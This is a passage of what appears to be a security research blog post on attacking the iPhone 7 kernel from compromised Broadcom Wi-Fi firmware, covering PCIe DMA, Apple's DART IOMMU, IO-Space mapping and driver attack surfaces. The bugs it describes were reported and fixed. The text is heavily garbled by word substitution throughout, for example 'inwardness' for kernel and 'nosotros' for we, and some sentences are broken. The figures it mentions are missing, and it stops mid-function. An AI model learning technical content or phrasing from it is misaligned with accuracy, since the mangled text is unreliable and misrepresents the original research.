Langsung ke konten utama

Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack On Apple Tree Devices

Posted past times Gal Beniamini,

In this spider web log postal service we’ll consummate our goal of achieving remote inwardness code execution on the iPhone 7, past times agency of Wi-Fi communication alone.

After developing a Wi-Fi firmware exploit inwards the previous spider web log post, nosotros are left amongst the describe of using our newly acquired access to gain command over the XNU kernel. To this end, we’ll start past times investigating the isolation mechanisms nowadays on the iPhone. Next, we’ll explore the ways inwards which the host interacts amongst the Wi-Fi chip, seat several laid on surfaces, together with assess their corresponding safety properties. Finally, we’ll uncovering multiple vulnerabilities together with proceed to develop a fully-functional reliable exploit for ane of them, allowing us to gain command over the host’s kernel.


All the vulnerabilities presented inwards this spider web log postal service (#1, #2, #3, #4, #5, #6, #7) were reported to Apple together with afterwards fixed inwards iOS 11. For an analysis of other affected devices inwards the Apple ecosystem, catch the corresponding security bulletins.

Hardware Isolation

PCIe DMA


Broadcom’s Wi-Fi chips are nowadays inwards a broad make of platforms; including mobile phones, IOT devices together with Wi-Fi routers. To accommodate for this variance, each chip must live sufficiently configurable, supporting several unlike interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a broad make of supported interfaces, including PCIe, SDIO together with USB.


While choosing the interface amongst which to integrate the chip may seem inconsequential, it could take maintain far ranging security implications. Each interface comes amongst unlike safety guarantees, affecting the flat to which the peripheral may live “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s safety tin live subverted past times remote attackers, it’s clear that providing isolation is crucial inwards sufficiently safeguarding the host.

From a safety perspective, both SDIO together with USB (up to 3.1) inherently offering some flat of isolation. SDIO solely enables the series transfer of information betwixt the host together with the target device. Similarly, USB allows the transfer of “packets” betwixt peripherals together with the host. Broadly speaking, both interfaces tin live thought of equally facilitating an explicit communication channel betwixt the host together with the peripheral. All the information transported through these interfaces must live explicitly handled past times either peer, past times inspecting incoming requests together with responding accordingly.

PCIe operates using a unlike paradigm. Instead of communicating amongst the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare information structures inside the host’s memory, only signalling the host (via a Message Signalled Interrupt) ane time there’s processing to live done. Operating inwards this vogue allows the host to conserve computing resources, equally opposed to protocols that require processing to transfer information betwixt endpoints or to grip each private request.

Efficient equally this approach may be, it also raises some challenges amongst regards to isolation. First together with foremost, how tin nosotros live guaranteed that malicious peripherals won’t abuse this access inwards fellowship to laid on the host? After all, inwards the presence of total command over the host’s memory, subverting whatever computer programme running on the host is trivial (for example, peripherals may freely modify a program’s stack, alter portion pointers, overwrite code -- all unbeknownst to the host itself).

Luckily, this number has non gone unaddressed. Sufficient isolation for DMA-capable components tin live achieved past times partitioning the visible retentivity infinite available to the peripheral using a dedicated hardware constituent - an I/O Memory Management Unit (IOMMU).


IOMMUs facilitate a retentivity translation service for peripherals, converting their addressable retentivity ranges (referred to equally “IO-Space”) into ranges inside the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively command which portions of its retentivity are exposed to each peripheral, patch safeguarding other ranges against potentially malicious access. Consequently, the volume of the responsibleness for providing sufficient isolation lays amongst the host.

Returning to the number at hand, equally nosotros are focusing on the Wi-Fi stack nowadays inside Apple’s ecosystem, an immediate inquiry springs to heed -- which interfaces does Apple leverage to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images nowadays inwards several generations of Apple devices reveals that since the iPhone 6 (included), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such equally the iPhone 5c together with 5s, relied on a USB interface instead.


Due to the risks highlighted above, it is crucial that recent iPhones utilise an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, nosotros discovered that no isolation was enforced inwards 2 of the most prominent SoCs; Qualcomm’s Snapdragon 810 together with Samsung’s Exynos 8890, thereby allowing the Wi-Fi chip to freely access the host’s retentivity (leading to consummate compromise of the device).

Inspecting the DMA Engine


To gain some visibility into the isolation capabilities nowadays on the iPhone 7, we’ll start past times exploring the Wi-Fi firmware itself. If a shape of isolation is present, the retentivity ranges used past times the Wi-Fi SoC to perform DMA operations together with those utilised past times the host would live disparate. Conversely, if nosotros come about to uncovering the same ranges of physical addresses, that would hint that no         isolation is taking place.

Luckily, much of the complexity involved inwards reverse-engineering the firmware’s DMA functionality tin live forgone, equally Broadcom’s SoftMAC drivers (brcm80211) contain the bulk of the code used to interface amongst the SoC’s DMA engine.

Each DMA engine facilitates transfers inwards a unmarried administration betwixt 2 endpoints; ane representing the Wi-Fi firmware, together with some other denoting either an internal core inside the Wi-Fi SoC (such equally when interacting amongst the RX or TX FIFOs) or the host itself. As nosotros are interested inwards inspecting the retentivity ranges used for transfers originating inwards the Wi-Fi chip together with terminating at the host, nosotros must locate the DMA engine responsible for “dongle-to-host” retentivity transfers.

As it happens, this describe is rather straightforward. Each “dma_info” construction inwards the firmware (representing a DMA engine) is prefixed past times a pointer to a block of DMA-related portion pointers stored inwards the firmware’s RAM. Since the block is placed at a fixed address, nosotros tin locate all instances of the construction past times searching for the pointer inside the firmware’s RAM. For each instance nosotros come upwards across, inspecting the “name” acre encoded inwards the construction should allow us to deduce the identity of the DMA engine inwards question.


Combining these 2 tidbits, nosotros tin rapidly locate each DMA engine inwards the firmware’s RAM:


The inaugural off few instances clearly relate to internal DMA engines. The lastly instance, labeled “H2D”, indicates “host-to-dongle” retentivity transfers. Therefore, past times elimination, the unmarried entry left must correspond to transfers from the dongle to the host (sneakily left unnamed!).

Having located the engine, all that remains is to dump the RX descriptor band together with extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are rapidly consumed after existence inserted into the corresponding rings, replacing their contents amongst generic placeholder values. Therefore, observing the value of a non-consumed descriptor from a unmarried retentivity snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.

After inserting the hook, nosotros are presented amongst the next output:


All of the descriptor addresses appear to live 32-bits wide...

How make the higher upwards addresses relate to our cognition of the physical address infinite on the iPhone 7? The DRAM’s base of operations address inwards the host’s physical address infinite is denoted past times the “gPhysBase” variable (stored inwards the kernel’s BSS). Reading this value from our enquiry platform volition allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:


Ah-ha! The iPhone 7’s DRAM is based at 0x800000000 -- an address beyond a 32-bit range.

Therefore, some shape of conversion is taking house betwixt the ranges visible to the Wi-Fi chip (IO-Space) together with those corresponding to the host’s physical address space. To locate the root crusade of this conversion, let’s shift our attending dorsum towards the host.

DART


The host together with the Wi-Fi chip communicate amongst ane some other using a protocol designed past times Broadcom, dubbed “MSGBUF”. Using the protocol, both endpoints are able to transmit together with have command messages, equally good equally traffic, through a laid of “message rings”. Each band is stored inside the host’s memory, but is also made accessible to the firmware through DMA.

Since the rings must live accessible through DMA to the Wi-FI chip, locating the code responsible for their initialisation mightiness shed some low-cal on the procedure through which their physical addresses are converted to the DMA-accessible addresses nosotros encountered inwards the firmware’s DMA descriptors.

Reverse-engineering AppleBCMWLANBusInterfacePCIe, nosotros rapidly larn far at the portion responsible for initialising the IPC structures utilised past times the Wi-Fi chip together with the host, including the aforementioned rings:

1.  void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {
2.      ...
3.      IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;
4.      IOBufferMemoryDescriptor* desc =
5.          IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,
6.                                                      options,
7.                                                      capacity,
8.                                                      alignment);                                    
9.      ...
10.     IODMACommand* cmd = IODMACommand::withSpecification(
11.         IODMACommand::OutputLittle64,  //outSegFunc
11.         0,                             //numAddressBits
12.         0,                             //maxSegmentSize
13.         0,                             //mappingOptions
14.         0,                             //maxTransferSize
15.         1,                             //alignment
16.         mapper,                        //mapper
17.         0);                            //refCon
18      ...
19.     cmd->setMemoryDescriptor(desc, true);
20.     ...
21. }
function 0xFFFFFFF006D1C074

As nosotros tin catch above, the portion utilises I/O Kit APIs to handle together with map DMA-capable descriptors.

Upon closer inspection, nosotros tin catch that first part of our research. Therefore, nosotros tin proceed to extract the IOMapper instance together with start tracing through its associated code paths.

While the source code for IOMapper is available inwards the open-sourced portions of XNU, it does non perform whatever actual mapping operations, but rather delegates them to the “System Mapper” - a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are nowadays inwards the open-sourced portions of XNU, nosotros tin assume that a specialised subclass, performing the actual mapping implementation, exists inwards ane of the proprietary KEXTs.

Indeed, next the extracted IOMapper’s virtual table, nosotros larn far at the IODARTMapper class, nether com.apple.driver.IODARTFamily -- it seems a specialised IOMapper is used after all!

Before nosotros move along downwards the rabbit hole, let’s take maintain a measurement dorsum together with assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table” -- a hardware constituent integrated into the retentivity controller, whose purpose it is to supply a separate address infinite mapping for 32-bit PCI peripherals. DART allows the organisation to map physical addresses beyond the 32-bit make to peripherals, together with to supply fine-grained command over exposed retentivity ranges to each device. In short, this is non other than a proprietary IOMMU designed past times Apple!

Digging deeper into IODARTMapper, nosotros uncovering iovmInsert; the entry dot for inserting novel IO-Space translations through a mapper. Passing through several to a greater extent than layers of indirection, nosotros finally larn far at an instance of AppleS5L8960XDART.


The latter object originates inwards a unlike driver; com.apple.driver.AppleS5L8960XDART. It appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”; the production code for the Apple A7 SoC (used inwards older iPhones, such equally the 5s). Perhaps this artefact suggests that the same DART implementation has been used inwards prior SoC revisions.

Taking a closer facial expression at AppleS5L8960XDART, nosotros rapidly come upwards across a portion of particular interest. This portion performs many chip shifts together with masks, much similar we’d await from translation-table administration code. After spending some fourth dimension familiarising ourselves amongst the code, nosotros come upwards to the realisation that the portion is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:

1.  void* create_descriptors(void* this, uint64_t table_index,
2.                           uint32_t start_pfn, uint32_t map_size, ...) {
3.
4.      ... //Validate input arguments, larn mutex
5.      void** dart_table = ((void***)(this + 312))[table_index];
6.      uint32_t end_pfn  = start_pfn + map_size;
7.
8.      //Populating each L0 descriptor inwards the range
9.      uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;
10.     uint32_t l0_end_idx   = (end_pfn   >> 18) & 0x3;
11.      
12.     for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {
13.      
14.         //Creating the L1 tabular array if it doesn’t already exist
15.         struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);
16.         if (!l1_table) {
17.             l1_table = allocate_l1_table(this);
18.             dart_table[l0_idx] = l1_table;
19.             uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);
20.             uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;
21.             OSSynchronizeIO();
22.             set_l0_desc(this, table_index, l0_idx, l0_desc);
23.         }
24.   
25.         //Calculating the make of L1 descriptors to populate
26.         uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?
27.                                      (start_pfn >> 9) & 0x1FF : 0;
28.         uint32_t l1_end_idx   = (l0_idx == l0_end_idx) ?
29.                                      (end_pfn   >> 9) & 0x1FF : 511;
30.
31.         //Populating each L1 descriptor inwards the range
32.         for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {
33.
34.             //Creating the L2 tabular array if it doesn’t already exist
35.             struct l2_table_t* l2_table;
36.             l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];
37.             if (!l2_table) {
38.                 l2_table = allocate_l1_desc(this);
39.                 l1_table->l2_tables[l1_idx] = l2_table;
40.                 uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);
41.                 l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;
42.                 OSSynchronizeIO();
43.                 ...
44.             }
45.         }
46.     }
47.     ... //Release mutex
48.  }
49.
50. struct l1_table_t {
51.    IOBufferMemoryDescriptor* desc;      //Descriptor belongings L1 table
52.    uint64_t* descriptors;               //Kernel VA ptr to L1 descs
53.    struct l2_table_t* l2_tables[512];   //L2 descriptors inside this table
54. };
55.
56. struct l2_table_t {
57.     IOBufferMemoryDescriptor* desc;     //Descriptor belongings L2 tabular array
58.     uint64_t* descriptors;              //Kernel VA ptr to L2 descs
59.     uint64_t unknown;
60. };
function 0xFFFFFFF0065978F0

Alright! Let’s take maintain a instant to unpack the higher upwards function.

For starters, it appears that DART utilises a 3-level translation regime. The inaugural off flat is capable of belongings upwards to 4 descriptors, patch each subsequent flat holds 512 descriptors. Since DART uses a 4KB translation granule, nosotros tin deduce that, inwards ascending order, L2 tabular array maps 0x200000 bytes into IO-Space, patch L1 tables map upwards to 0x40000000 bytes.

In add-on to the 3-level authorities specified above, DART holds 4 “base descriptors”. Unlike regular descriptors, these are not indexed past times bits inwards the IO-Space address, but are instead referenced explicitly using a parameter provided past times the caller.

Drawing on our cognition of PCIe, nosotros tin speculate on the nature of these “base descriptors”. Perhaps each DART tin facilitate mappings for several unlike PCI peripherals on the same bus, where each “base descriptor” corresponds to ane such device (based on the “Requester-ID” encoded inwards the incoming TLP)? Whether or non this is the case, dumping the “base descriptors” inwards the DART instance corresponding to the Wi-Fi chip reveals that only the inaugural off descriptor is populated inwards our case.

In fellowship to access the DART mappings, 2 distinct sets of information structures are utilised inwards tandem; a laid of “convenience” structures which map the translation hierarchy into high-level objects inside the kernel’s virtual address space, together with some other laid belongings the descriptors themselves, which are linked together based on physical addresses. The erstwhile laid is used past times the inwardness to conveniently locate together with modify DART’s mappings, patch the latter is used past times DART’s hardware to perform the actual IO-Space translations.



Looking to a greater extent than closely at the descriptors, it appears that the translation format utilised past times DART is proprietary, together with does non gibe the formats nowadays inwards the ARM VMSA (including those utilised past times SMMUs). Nonetheless, nosotros tin deduce the descriptors’ composition past times inspecting the code above, which constructs together with populates descriptors across the translation hierarchy.

L0 descriptors encode the physical frame number (using a 4KB translation granule) corresponding to the side past times side flat tabular array inwards the lower bits, together with laid the 31st chip to dot a valid entry. L1 together with L2 descriptors, on the other hand, work the bottom 2 bits to dot validity (setting both bits denotes a valid entry, other combinations resultant inwards translation faults), patch the top bits shop the physical address of either the side past times side translation tabular array or of the 4KB part mapped into IO-Space.


Lastly, nosotros must deduce IO-Space’s base of operations address to consummate our analysis of DART’s translation format. Drawing on our previous run across amongst IO-Space addresses stored inwards the DMA descriptors inside the Wi-Fi firmware, all the addresses appeared to live based at address 0x80000000. As such, it seems similar a fair supposition that IO-Space mappings for the Wi-Fi chip start at the aforementioned address.

Combining all of the information above, let’s build a module inwards our enquiry platform to interact amongst the DART instance. The module volition analyse DART’s translation tables, next the hierarchy described above. By analysing the translation tables, nosotros tin afterwards take maintain a mapping betwixt IO-Space addresses together with their corresponding physical ranges inside the host’s PAS. Furthermore, nosotros tin invert the tables inwards fellowship to create a PAS to IO-Space mapping. Using these 2 mappings nosotros tin afterwards convert IO-Space addresses to physical addresses, together with vice versa.

Finally, inwards add-on to inspecting IO-Space, our DART module also allows us to manipulate IO-Space, past times introducing novel mappings into IO-Space containing whichever physical address nosotros desire.

At long last, nosotros tin seek whether our deductions regarding DART’s construction are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, nosotros tin proceed to dump the entire mapping betwixt IO-Space addresses together with their corresponding physical ranges past times next DART’s translation hierarchy:


Great! The inaugural off few mappings appear sane -- each IO-Space address is translated into a corresponding physical make good inside the host’s PAS. Moreover, nosotros tin catch that our supposition regarding DART’s translation granule holds, equally some mapped physical addresses are inside a 4KB make from ane another.

To live absolutely sure that our assessment is valid, let’s perform some other curt experiment. We’ll map-in an unused IO-Space address, pointing it at a physical address corresponding to “spare” information inside the kernel’s BSS. Next, using the DMA claw nosotros inserted previously, we’ll direct unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should larn far at our chosen BSS address.

After inserting the claw together with monitoring the mapped BSS make (by reading it through the kernel’s VAS), nosotros are presented amongst the next result:


Awesome! We managed to DMA into an arbitrary physical address inside the kernel’s BSS, thus confirming that our understanding of DART is correct.

Exploring DART


Using our newly acquired command over IO-Space, nosotros tin proceed to conduct a few experiments.

For starters, it would live interesting to catch whether the inwardness integrity mechanisms nowadays on the iPhone vii (“KTRR”, previously referred to equally “AMCC”), silent take maintain inwards the presence of malicious DMA attempts from the Wi-Fi chip. To uncovering out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, together with notice their contents to catch whether they were successfully modified.

Unsurprisingly, each endeavour to DMA into a protected part results inwards a fault existence raised, afterwards triggering a inwardness panic together with crashing the device. Attempting to DMA into the KTRR’s hardware registers storing protected part ranges similarly fails -- ane time the lockdown occurs, no modification of the registers is permitted.


Continuing our analysis of DART, let’s consider some other edge-case scenario: assume 2 subsequent IO-Space mappings correspond to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary betwixt the 2 IO-Space ranges live permitted? If so, should the information live separate across the corresponding physical ranges? Or should the transfer instead only utilise the inaugural off physical range?

To uncovering out, we’ll conduct some other experiment. First, we’ll create 2 IO-Space mappings pointing at disparate regions inwards the Kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary betwixt the 2 IO-Space addresses.


Running the higher upwards experiment together with monitoring the resulting addresses through the kernel’s VAS, nosotros are presented amongst a positive resultant -- DART correctly splits the transaction into the 2 corresponding physical ranges, thus never exceeding whatever of the mapped-in regions’ bounds.

So far, so good.

PCIe Configuration Space


Continuing our investigation of DART, nosotros larn far at some other query -- how does DART perform context determination? Namely, how does DART differentiate betwixt the components issuing the retentivity access requests?

Depending on DART’s architecture, several solutions to this inquiry exist. If each DART is assigned to a unmarried constituent or a unmarried PCIe bus, no identification is needed, equally it tin only funnel all operations from that source through its translation mechanism. Alternately, if several PCIe components be on the autobus to which DART is assigned, it could utilise the “Requester ID” (RID) acre inwards the PCIe TLP to seat the originating component.

Using the RID for context determination is non risk-free, equally malicious PCIe components may endeavour to “spoof” the contents of their TLPs. To bargain amongst such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to perform routing decisions, including disallowing transfer of sure TLPs based on their encompassed IDs. As nosotros are non aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).

With regards to command over the PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe Core’s functionality to the Wi-Fi firmware past times mapping the core’s registers through a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which principle over the physical (PLP), information link (DLLP) together with carry (TLP) layers of PCIe. Regardless, it is unknown whether the this machinery allows modification of the RID, or indeed whether this shape of access is silent nowadays inwards current-gen Broadcom hardware.

Nevertheless, standardised PCIe mechanisms be which may also touching on the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” acre patch expanding the “function” acre to 8 bits.


While unremarkably the PCIe Configuration Space is accessed through the host, Broadcom’s Wi-Fi SoC exposes the configuration infinite within the Wi-Fi SoC, through a span of backplane registers corresponding to the PCIe Core (configaddr / configdata). Using these registers, the Wi-Fi firmware tin non only read the PCIe Configuration Space, but also modify values inside it. Like many advanced PCIe features, ARI is exposed inwards the configuration infinite through an “extended capability” blob; therefore, if ARI is supported past times the PCIe core, nosotros could utilise our access to the configuration infinite to enable the characteristic from the Wi-Fi firmware.

To determine whether such capabilities are nowadays inwards the PCIe core, we’ll create a dump of the configuration infinite (using the aforementioned register pair). After doing so, nosotros tin only reorganise the contents inwards a format legible to lspci, together with teach it to parse the given data, producing a human-readable representation of the features supported past times the PCIe core:


Scanning through the higher upwards capabilities, it appears that none of the “advanced” PCIe features (such equally ARI) are supported past times the PCIe core.

Exploring IO-Space


While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, nosotros take maintain yet to investigate the contents of the retentivity exposed through this mechanism. In fellowship to investigate IO-Space’s contents, we’ll work a two-stage translation process; first, we’ll work our DART module to create a mapping betwixt the IO-Space addresses together with their corresponding physical ranges. Once nosotros obtain the mapped physical ranges, all that remains is to map these ranges into the kernel’s VAS, allowing us to afterwards dump their contents using our enquiry platform.

As nosotros know, the mapping from virtual to physical addresses is governed past times the MMU’s translation tables. On ARMv8-A platforms (such equally the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables utilised past times the ARM MMU. Like whatever XNU task, the kernel’s translation tables are accessible through its task_t construction (exported through its information segment). Following the entries inwards the describe structure, nosotros larn far at its pmap, belongings the translation tables.

Putting the 2 together, nosotros tin write some code inwards our enquiry framework to locate the kernel’s task, extract the internal translation tables, together with encapsulate the information therein inwards a module representing an ARMv8 translation table.

Using our novel module, nosotros tin at nowadays perform translations betwixt the virtual addresses inwards the kernel’s VAS together with physical ones. Furthermore, nosotros tin invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. In tandem amongst our DART module, this allows us to take maintain each IO-Space address, convert it to a physical address, together with and so work our inverted translation tabular array to convert it dorsum to a virtual address inwards the kernel’s VAS.

Consequently, nosotros tin at nowadays iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:



After producing a re-create of the entire contents of IO-Space, nosotros tin at nowadays comb through it, searching for whatever “accidental” mappings that mightiness live beneficial for a would-be assaulter nowadays on the Wi-Fi chip.

For starters, recall that the inwardness protects itself against remote attackers past times utilising KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base of operations loading address (both virtual together with physical). Since many exploits rely on the powerfulness to pre-calculate addresses inside the kernel’s VAS, such a mitigation may ho-hum downwards attackers, or hinder the reliability of exploits targeting the kernel.

However, equally the same “slide” value is applied globally, it is oft the instance that a unmarried “leaked” inwardness VAS address results inwards a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if whatever inwardness virtual address is accidentally leaked inwards an IO-Space mapped page, the Wi-Fi chip may live able to similarly subvert KASLR.

Apart from the potential implications regarding KASLR, the presence of whatever inwardness VAS pointer inwards IO-Space would live worrisome, equally the pointer mightiness live utilised past times inwardness code. Allowing a malicious Wi-Fi chip to corrupt its value may afterwards touching on the kernel’s behavior (perhaps fifty-fifty resulting inwards code execution).

To uncovering out whether whatever inwardness pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses inside the kernel’s VAS. After going through every unmarried page, nosotros are greeted amongst a negative result; nosotros tin uncovering no inwardness VAS pointers inwards whatever IO-Space mapped page!

With a cursory investigation of IO-Space out of the way, nosotros tin at nowadays dig deeper, attempting to gain a improve understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
  1. Inspect each page’s contents to facial expression for hints regarding its role
  2. Locate the inwardness code responsible for interacting amongst the same IO-Space range
  3. Check the IO-Space address against posted addresses inwards the Wi-Fi firmware
  4. Use the Android driver equally reference for whatever “strange” unidentified constructs

After performing the higher upwards steps, nosotros are finally able to slice together a consummate mapping of IO-Space (thus also terminal that no “accidental” mappings are present). It is of import to complaint that since IO-Space is non acre of study to randomisation, the IO addresses are constant, together with are non affected past times the KASLR slide.

Searching For Vulnerabilities


Having explored the aspects relating to DART, IO-Space mappings, together with low-level components, let’s proceed to inspect the to a greater extent than traditional laid on surfaces exposed past times the host.

Recall that the Wi-Fi chip together with the host communicate amongst ane some other through a series of “rings”, mapped into IO-Space. Each band facilitates the transfer of information inwards a unmarried direction; either from the device to the host (D2H), or vice versa (H2D).

Among the messages transferred through message rings, “Control Messages” correspond a rather abundant laid on surface. These message are used to teach the firmware to perform complex state-changing operations, such equally creating additional message rings, deleting them, together with fifty-fifty transporting high-level requests (ioctls) to live processed past times the firmware.

Due to their complexity, command messages rely on a bidirectional communication channel; the “Control Submit” band (H2D) allows the host to submit the requests to the device, patch the “Control Complete” band (D2H) is used past times the device to render the results dorsum to the host.

After committing messages to the D2H rings, the Wi-Fi firmware signals the host past times writing to a “MailBox” register together with triggering an MSI interrupt. This interrupt is afterwards handled past times the host, which inspects the MailBox register, together with notifies the corresponding (D2H) rings that information may live available for processing.



Tracing through the higher upwards flow, nosotros make the handler portion for processing incoming command messages inside the host. To aid inwards reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the command structures, equally good equally the message codes corresponding to each request.

AppleBCMWLANBusPCIeInterface::drainControlCompleteRing

The encapsulating handler only reads the “message type” field, together with proceeds to delegate the message’s processing to a dedicated handler -- ane per message type. Going over each of the handlers, nosotros stumble across a memory corruption bug triggerable past times the firmware. Incidentally, the põrnikas was nowadays inwards a handler for a message type which isn’t available inwards the Android driver.

Moving on, let’s laid our sights on slightly higher targets inwards the protocol stack. Recall that command rings are also used to carry high-level command requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either laid a firmware-specific configuration value, or to retrieve its electrical flow value. As this channel is quite versatile, much of the high-level interaction betwixt the host together with the firmware is enacted through this channel, including retrieving the electrical flow channel, setting network configurations, together with more.

However, similar whatever other signal originating from the device, it is of import to recall that “ioctls” tin live co-opted past times malicious Wi-Fi firmware. After all, an assaulter controlling the Wi-Fi firmware tin only claw the “ioctl” treatment function, thereby allowing total command over the contents transmitted dorsum to the host.

Reverse-engineering the high-level driver, AppleBCMWLANCore, nosotros rapidly seat the entry dot responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross referencing the function, nosotros uncovering nearly 500 telephone call upwards sites, several of which human activity equally wrappers for mutual functionality, thus revealing fifty-fifty to a greater extent than originating telephone call upwards sites. After going over each of the aforementioned sites, nosotros uncovering several memory corruptions inwards their corresponding handlers.

Lastly, there’s ane to a greater extent than communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted past times a unique EtherType (0x886C), carry unsolicited events from the firmware, requiring special treatment past times the host. Tracing through the host’s RX path brings us to the entry dot for treatment such frames:


AppleBCMWLANCore::handleEventPacket

Once again, going over each handler inwards the higher upwards portion (while using the Android driver to aid our understanding of the corresponding lawsuit codes together with information structures), nosotros uncovering two more vulnerabilities.

Better Vulnerabilities

Data Races?


While the vulnerabilities nosotros exactly discovered allow us to trigger several forms of retentivity corruptions inwards the host (OOB writes, heap overflows), together with fifty-fifty to leak constrained information from the host to the firmware, reliably exploiting whatever of them remains rather challenging.

For starters, the Wi-Fi chip has no visibility into the host’s retentivity (apart from the IO-Space mapped regions), together with relatively footling command over objects allocated inside the kernel. Therefore, training the kernel’s retentivity inwards fellowship to successfully launch a heap retentivity corruption laid on would require pregnant effort. What’s more, this challenge is compounded past times the presence of KASLR, preventing us from accurately locating the kernel’s information structures (barring whatever information disclosure).

Nonetheless, perhaps nosotros tin seat improve primitives past times earthworks deeper!

So far, we’ve only considered the contents of the information transferred betwixt the host together with the firmware. Effectively, nosotros were thinking of the firmware together with the host equally 2 distinct entities, communicating amongst ane some other through an isolated communication channel. In fact, cipher tin live farther from the truth -- the 2 endpoints portion a PCIe interface, allowing the firmware to perform DMA accesses at volition to whatever IO-Space address.

One of the major risks when using a shared retentivity interface is the affair of timing. While the host together with firmware unremarkably synchronise their operations to ensure that no information races occur, attackers controlling the Wi-Fi firmware are saltation past times no such agreement. Using our command over the Wi-Fi chip, nosotros tin intentionally modify information structures inside IO-Space as they are existence accessed past times the host. Doing so mightiness allow us to innovate race conditions, such equally TOCTTOUs, creating vulnerable atmospheric condition inwards otherwise prophylactic code (under normal assumptions).

The inaugural off target for such modification are the command messages nosotros inspected before on. Inspecting the command band handler inwards the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility for information races inwards their processing. Nonetheless, going over the relevant code paths, nosotros uncovering no security-relevant races.

What nigh the 2nd command channel nosotros reviewed -- lawsuit packets? Perhaps nosotros could modify a packet’s contents patch it is existence processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative; each transferred parcel is inaugural off copied from its IO-Space mapped buffer to a kernel-resident mbuf before afterwards passing it on for processing, thus eliminating the possibility of firmware-induced races.

Message Rings, Revisited


So far, we’ve inspected the high-level functionality provided past times message rings, namely, the command messages transported therein. However, we’ve neglected several aspects of their operation. One implementation item of particular complaint is the method through which rings allow the endpoints to synchronise their accesses to the ring.

To allow concurrent accesses past times both the ring’s consumer together with its corresponding producer, each band is assigned a span of indices: a read index specifying the location upwards to which the consumer has read the messages, together with a write index specifying the location at which the side past times side message volition live submitted past times the producer. As their call implies, each band forms a circular buffer -- upon arriving at the lastly band index, the indices only wrap around, returning dorsum to the ring’s base.


Since both endpoints must live aware of the band indices to successfully coordinate their access, a machinery must be through which the indices may live shared betwixt the two. In Apple’s case, this is achieved past times mapping all the indices into IO-Space mapped buffers.


While mapping the indices into IO-Space is a convenient way to portion their values, it is non risk-free. For starters, if all the higher upwards indices are mapped into IO-Space, a malicious Wi-Fi chip may non only utilise DMA access to read them, but may also live able to modify them.

This shape of access is excessive -- after all, the device demand only update the read indices for H2D rings, together with the write indices for D2H rings. The remaining indices should, at most, live read past times the device. However, equally DART’s implementation is proprietary, it is unknown whether it tin facilitate read-only mappings. Consequently, all of the higher upwards indices are mapped into IO-Space equally both readable together with writable, thus allowing a malicious Wi-Fi chip to freely alter their values.

This IO-Space-based index sharing machinery raises an of import question; what if a Wi-Fi chip were to maliciously modify a ring’s indices patch the band is existence processed past times the host? Would doing so innovate a race condition? To uncovering out, let’s take maintain a facial expression at the portion through which the host submits messages into H2D rings:

1.  void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,
2.                                                         uint32_t* p_write_index) {
3.
4.      //Getting the write index from the IO-Space mapped buffer (!)
5.      uint32_t write_index = *(this->write_index_ptr);
6.      
